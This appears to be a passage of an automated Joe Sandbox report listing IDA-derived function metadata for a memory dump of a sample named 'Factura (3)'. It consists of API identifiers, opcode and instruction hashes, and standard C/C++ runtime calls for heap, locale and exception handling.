                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      • Opcode ID: f51f0ab422852233123e64330f26f29acff0743bc7bf2c9003033929a7e2be9e
                                                      • Instruction ID: 371ede4a527463f0b4a1988a8dfa6ceae594d7c453dc4a147258605057ccf9f8
                                                      • Opcode Fuzzy Hash: f51f0ab422852233123e64330f26f29acff0743bc7bf2c9003033929a7e2be9e
                                                      • Instruction Fuzzy Hash: 78118D51F0D94B65FA9C7FB255D22B8A1828F94314FC004B4EA1DC71D3ED1DB8E1A2BA

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                      • String ID:
                                                      • API String ID: 1173176844-0
                                                      • Opcode ID: f191a0376925299139c7c8e1ffc9a3835da450373a9bb438b96ab324ffb1957f
                                                      • Instruction ID: d3727f643cb6c60e49e47e641f311b187d343e4f87ec299c7d9dd2447ab8f0b7
                                                      • Opcode Fuzzy Hash: f191a0376925299139c7c8e1ffc9a3835da450373a9bb438b96ab324ffb1957f
                                                      • Instruction Fuzzy Hash: 65E0EC10F4A90FA5FD6C3AB714D607491800F597B8ED81BB0DD7D862D3AD1CA4E5A138

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      • Opcode ID: c4077998ab788d16ef59c5c367e1fb227c4ba129c7e49a8aabc496dc11d071e4
                                                      • Instruction ID: f4a153f51f3e898ce9d441ef7380259504887f566949313d99847e670085ad04
                                                      • Opcode Fuzzy Hash: c4077998ab788d16ef59c5c367e1fb227c4ba129c7e49a8aabc496dc11d071e4
                                                      • Instruction Fuzzy Hash: E3219F32F0A60199EB29BF65C4C02AC73E4EB54718F840635DA1C86ADADF78E485DB90

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 03050a372492c2843a2563fceab3d08d7bdef971b1626472b96fc408fbfb45d5
                                                      • Instruction ID: ed1adf0c721468e376dc3afb7aa648755186069f540ef6e7ab9a203a44eca87d
                                                      • Opcode Fuzzy Hash: 03050a372492c2843a2563fceab3d08d7bdef971b1626472b96fc408fbfb45d5
                                                      • Instruction Fuzzy Hash: EA21D732618E8197D769AF2AE484379B2A0FB84B54FA40234E75DC76E5DF3CD4009B10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 1b8bd8de029ed5c5eb4174303f7482559074fbfbe1bcddd89a7628224b0da41d
                                                      • Instruction ID: 577e7cd28354f5ea7fd79e31adb5acfc560e92382899c66a66fcb9dff78c048b
                                                      • Opcode Fuzzy Hash: 1b8bd8de029ed5c5eb4174303f7482559074fbfbe1bcddd89a7628224b0da41d
                                                      • Instruction Fuzzy Hash: 3D115161B1E54561FB69BE2694C137DE2E06FC5F94FC44471E64C87685DE3CF400A760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7340F7EDE,?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F80B9
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      APIs
                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF7340DCEBD
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWork
                                                      • String ID:
                                                      • API String ID: 1865873047-0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF7340FF0A1,?,?,00000000,00007FF7341013CB,?,?,?,00007FF7340F4FBB,?,?,?,00007FF7340F4EB1), ref: 00007FF7340FB92E
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 808467561-2761157908
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                      • String ID: utf8
                                                      • API String ID: 3069159798-905460609
                                                      APIs
                                                      Similarity
                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 2591520935-0
                                                      APIs
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      APIs
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      APIs
                                                      Similarity
                                                      • API ID: memcpy_s
                                                      • String ID:
                                                      • API String ID: 1502251526-0
                                                      APIs
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1791019856-0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      APIs
                                                      Similarity
                                                      • API ID: ExceptionRaise_clrfp
                                                      • String ID:
                                                      • API String ID: 15204871-0
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: e+000$gfff
                                                      • API String ID: 0-3030954782
                                                      APIs
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      Similarity
                                                      • API ID: ErrorLastValue$InfoLocale
                                                      • String ID:
                                                      • API String ID: 673564084-0
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7341042B3,?,00000000,00000092,?,?,00000000,?,00007FF7340F5F4D), ref: 00007FF734103B62
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                      • String ID:
                                                      • API String ID: 3029459697-0
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF734103E26), ref: 00007FF7341040B3
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocaleValue
                                                      • String ID:
                                                      • API String ID: 3796814847-0
                                                      APIs
                                                        • Part of subcall function 00007FF7340F7D04: GetLastError.KERNEL32 ref: 00007FF7340F7D13
                                                        • Part of subcall function 00007FF7340F7D04: FlsGetValue.KERNEL32 ref: 00007FF7340F7D28
                                                        • Part of subcall function 00007FF7340F7D04: SetLastError.KERNEL32 ref: 00007FF7340F7DB3
                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF73410426F,?,00000000,00000092,?,?,00000000,?,00007FF7340F5F4D), ref: 00007FF734103C12
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                      • String ID:
                                                      • API String ID: 3029459697-0
                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7340F859F,?,?,?,?,?,?,?,?,00000000,00007FF734103114), ref: 00007FF7340F819F
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID:
                                                      • API String ID: 2086374402-0
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: gfffffff
                                                      • API String ID: 0-1523873471
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 00007FF7340FE6A5
                                                        • Part of subcall function 00007FF7340F8064: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7340F7EDE,?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F80B9
                                                        • Part of subcall function 00007FF7340F80DC: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7340E7683), ref: 00007FF7340F80F2
                                                        • Part of subcall function 00007FF7340F80DC: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7340E7683), ref: 00007FF7340F80FC
                                                        • Part of subcall function 00007FF734106658: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73410668B
                                                      Similarity
                                                      • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3806578645-0
                                                      APIs
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 4023145424-0
                                                      Similarity
                                                      • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 1500699246-0
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 485612231-0
                                                      Similarity
                                                      • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 3904239083-1405518554
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: f$p$p
                                                      • API String ID: 3215553584-1995029353
                                                      Similarity
                                                      • API ID: Mpunct$ctypestd::ios_base::width
                                                      • String ID: @
                                                      • API String ID: 3075750325-2766056989
                                                      • Opcode ID: f4c72cae165faeedf3d4aa73199741d3ffaa5c6b57af870b3040c360871807d5
                                                      • Instruction ID: 9a446b3d9d128a099a67699a27c35247b27597e9c53615fe4de3676683094e51
                                                      • Opcode Fuzzy Hash: f4c72cae165faeedf3d4aa73199741d3ffaa5c6b57af870b3040c360871807d5
                                                      • Instruction Fuzzy Hash: 8812063261DAC591DA74EB56E4943AAF7A1F7C9780F800072EA8D83BA9DF3CD544DB10
                                                      APIs
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 81ee503e79cd9d06f6ac34c0c27b23d2bdbaa24f0b3b40a5e112f139e7148bd8
                                                      • Instruction ID: 1e915d5889d917e0a8f99beb02d51b05de9f23e7e6157d73bcfabf24daf2595b
                                                      • Opcode Fuzzy Hash: 81ee503e79cd9d06f6ac34c0c27b23d2bdbaa24f0b3b40a5e112f139e7148bd8
                                                      • Instruction Fuzzy Hash: F7C1D132B0D686A1E668BF5694C02BDA7E0FB80B80FD50171DA4D87395CE7CE845AB20
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340ED9DD
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340ED9EB
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA15
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA83
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7340EDC0A,?,?,?,00007FF7340ECA9C,?,?,?,00007FF7340E9509), ref: 00007FF7340EDA8F
                                                      Strings
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      • Opcode ID: 999db5689f4d99c5d95ed67544fceb35df215e91ca3a674ab7cb3ed5369118bd
                                                      • Instruction ID: 29b4119ee9421748e1b62b1b7e8a13bf1c29313c3e308c0883d3af50353962ca
                                                      • Opcode Fuzzy Hash: 999db5689f4d99c5d95ed67544fceb35df215e91ca3a674ab7cb3ed5369118bd
                                                      • Instruction Fuzzy Hash: 2131C521B1EE06B0EE29AF07A484179A394FF84B64F9D0535DD2D87380EF3CE190A224
                                                      APIs
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: a1e4c6b3a0fa9e52562add9bfb766a02b427e70752296194f76d1e817e6380ff
                                                      • Instruction ID: f96ff71affe0f2fb481c4a4dbf59996e72a66306de625dc23c0c5fe12b71981d
                                                      • Opcode Fuzzy Hash: a1e4c6b3a0fa9e52562add9bfb766a02b427e70752296194f76d1e817e6380ff
                                                      • Instruction Fuzzy Hash: E321CF21B0A64262FA9C7F3365D50B9F1E15F887B0FD406B5D93E876C6EF2CB4016621
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      • Opcode ID: c7c48c9f329cee50831277793ef47e41c18c615e9af438121ae772ad541a5709
                                                      • Instruction ID: b870a318d6f332029a055c2c85e72d6bcc9a93d753e1c1943b690eb430b51003
                                                      • Opcode Fuzzy Hash: c7c48c9f329cee50831277793ef47e41c18c615e9af438121ae772ad541a5709
                                                      • Instruction Fuzzy Hash: 94118E21A18E4196E758AF47F888329E3A0FB88BE4F940234EA5EC7794DF7CD5048751
                                                      APIs
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide
                                                      • String ID:
                                                      • API String ID: 2829165498-0
                                                      • Opcode ID: 8f09e05667e55a467be64de7c917014b8b2d6792e95e7af5c5873f19423a4668
                                                      • Instruction ID: f74a02678f46c18946f00969432385ffa543bcf1a22954490a0e77ae2c20d329
                                                      • Opcode Fuzzy Hash: 8f09e05667e55a467be64de7c917014b8b2d6792e95e7af5c5873f19423a4668
                                                      • Instruction Fuzzy Hash: 2981E332708B4692EB28AF26A08036AF6D1FF447A8F940235EA1D87BC8DF7CD4549714
                                                      APIs
                                                      Similarity
                                                      • API ID: Fgetc
                                                      • String ID:
                                                      • API String ID: 1720979605-0
                                                      • Opcode ID: 3e2bf9995382065f4948322529ddc5a60683cd7dbd31b5e7fac337e272d39ca3
                                                      • Instruction ID: 21318116e480c300f72a4bf1b6a6a69b5ffedaebb03a43f400ec798884e80b14
                                                      • Opcode Fuzzy Hash: 3e2bf9995382065f4948322529ddc5a60683cd7dbd31b5e7fac337e272d39ca3
                                                      • Instruction Fuzzy Hash: E591642270DA8994DA64EF56E0903BEF7A0FBC1780F844471E6CD83699DE3CD494EB54
                                                      APIs
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyMpunctQueue::StructuredWorkshared_ptrstd::ios_base::width
                                                      • String ID:
                                                      • API String ID: 2515095778-0
                                                      • Opcode ID: f58fba2569b54437669825e63150ae70c4a53890a28a4fb230e01e746ff9f728
                                                      • Instruction ID: 1b66db024ba3249f623e0f1a5c5dce9e06e9cf29cd4efc57766dbd74f4eb051d
                                                      • Opcode Fuzzy Hash: f58fba2569b54437669825e63150ae70c4a53890a28a4fb230e01e746ff9f728
                                                      • Instruction Fuzzy Hash: 7881D732618AC995DA74EB12E4903EAE761FBC8780F800072EACD83B99DF3CD555DB50
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Mpunct$ctypestd::ios_base::width
                                                      • String ID: @
                                                      • API String ID: 3075750325-2766056989
                                                      • Opcode ID: ef834a0c7441b900ad624ed02ee982a973de64441cfa549280963f0c2916aa15
                                                      • Instruction ID: 04aeeaf81f5cba3042a9deee23f3beb792314e7464380738a5136c588b5d961e
                                                      • Opcode Fuzzy Hash: ef834a0c7441b900ad624ed02ee982a973de64441cfa549280963f0c2916aa15
                                                      • Instruction Fuzzy Hash: E3F1283260CAC994DA74AB16E4943EEE361F7C8780F800472EA8D83B69DF6CD594DB50
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 3523768491-393685449
                                                      • Opcode ID: c0cddb45a2abbcc732e9d66968630fcf0b47503d70b793808c6905956b72cee3
                                                      • Instruction ID: b0408e54bdfbf0b52dbcfdc7a33fc0611d71c539476f400d55e80db69fd4b22e
                                                      • Opcode Fuzzy Hash: c0cddb45a2abbcc732e9d66968630fcf0b47503d70b793808c6905956b72cee3
                                                      • Instruction Fuzzy Hash: AEE1F432A08B869AE714EF26D4C03ACB7A0FB44748F544176DE8D97656CF38E0D5EB14
                                                      APIs
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: aa543303047a5c3314217b12b730024ae9737a0205f84f9dac83058a3999850c
                                                      • Instruction ID: 0a7791aaea2727044a016f7ee65c436bcf27e8b0b72e26f2452fd861f4a0a561
                                                      • Opcode Fuzzy Hash: aa543303047a5c3314217b12b730024ae9737a0205f84f9dac83058a3999850c
                                                      • Instruction Fuzzy Hash: D0216C22A1CE8591DA14BF16F4C026EF3A0FBC57A4F901131F68E83BA9DE2CC1449B10
                                                      APIs
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: 1143b29f987bd34690dbc2be759c3df89f5d062c7dea06a6716a1daa17ab40e5
                                                      • Instruction ID: cddc15f4abe98c67a9ec865f78f5b9fb062b08f8adb26f74070613fa54a7fccc
                                                      • Opcode Fuzzy Hash: 1143b29f987bd34690dbc2be759c3df89f5d062c7dea06a6716a1daa17ab40e5
                                                      • Instruction Fuzzy Hash: 7F212C2261CE8591DA54AF16F4C026EF3A0FBC57A4F901271F68E83BB9DE2CD5549B10
                                                      APIs
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: a63ba4a3a04bf53c76ded1a94b5bc59be979fc8c1237f4d559dee9d770f00811
                                                      • Instruction ID: ef9f67219136daceec3c9c9fd58dbe9f69fba3aa222e21a5c1f7f3d01b3cb44c
                                                      • Opcode Fuzzy Hash: a63ba4a3a04bf53c76ded1a94b5bc59be979fc8c1237f4d559dee9d770f00811
                                                      • Instruction Fuzzy Hash: 05214C2261CE8991DA54AF16F4C026EF7A0FBC57A0F901571F68E83BA9DE2CD1549B10
                                                      APIs
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_taskGetfacet__int64std::locale::_
                                                      • String ID:
                                                      • API String ID: 2644824941-0
                                                      • Opcode ID: b5096ab7613cdef029ffb58c6c8f6feef40c555cefc4722ccf28266a2e72356f
                                                      • Instruction ID: 2bbc5483810bfe6770251a94b483be8714c424759f7d7c1407f35ad3b8544e62
                                                      • Opcode Fuzzy Hash: b5096ab7613cdef029ffb58c6c8f6feef40c555cefc4722ccf28266a2e72356f
                                                      • Instruction Fuzzy Hash: F0214C2262CE8591DA14AF16F4C026EF7A0FBC57A0F901571F68E83BB9DE2CD194DB10
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7E8B
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EC1
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EEE
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7EFF
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7F10
                                                      • SetLastError.KERNEL32(?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F7F2B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: d25e2a428f81a1e63488b58c64afde6197c83e7fae085f9ee0349d737f9f3be4
                                                      • Instruction ID: 0d21e02eb59b4287a67e8e12480900d990aa6cc00fb66a7d217498da5b4221be
                                                      • Opcode Fuzzy Hash: d25e2a428f81a1e63488b58c64afde6197c83e7fae085f9ee0349d737f9f3be4
                                                      • Instruction Fuzzy Hash: 7811BE21B0A602A2FA5CBF3365D10B9F1C15F487B0FD406B5E82E876C6EF2CB411A631
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 245f88685664180003ee324a8f11b9bf22120ac7b3f7975ca7d860f9767cd801
                                                      • Instruction ID: d89f61cafac6269f5764e86ec616de44159d43e9618a1acfeb25416757c47492
                                                      • Opcode Fuzzy Hash: 245f88685664180003ee324a8f11b9bf22120ac7b3f7975ca7d860f9767cd801
                                                      • Instruction Fuzzy Hash: F6F0C861B09E02A1FA1CAF26F4C8339E360AF54760F940235CA6D855E4DF3CD044DB21
                                                      Memory Dump Source
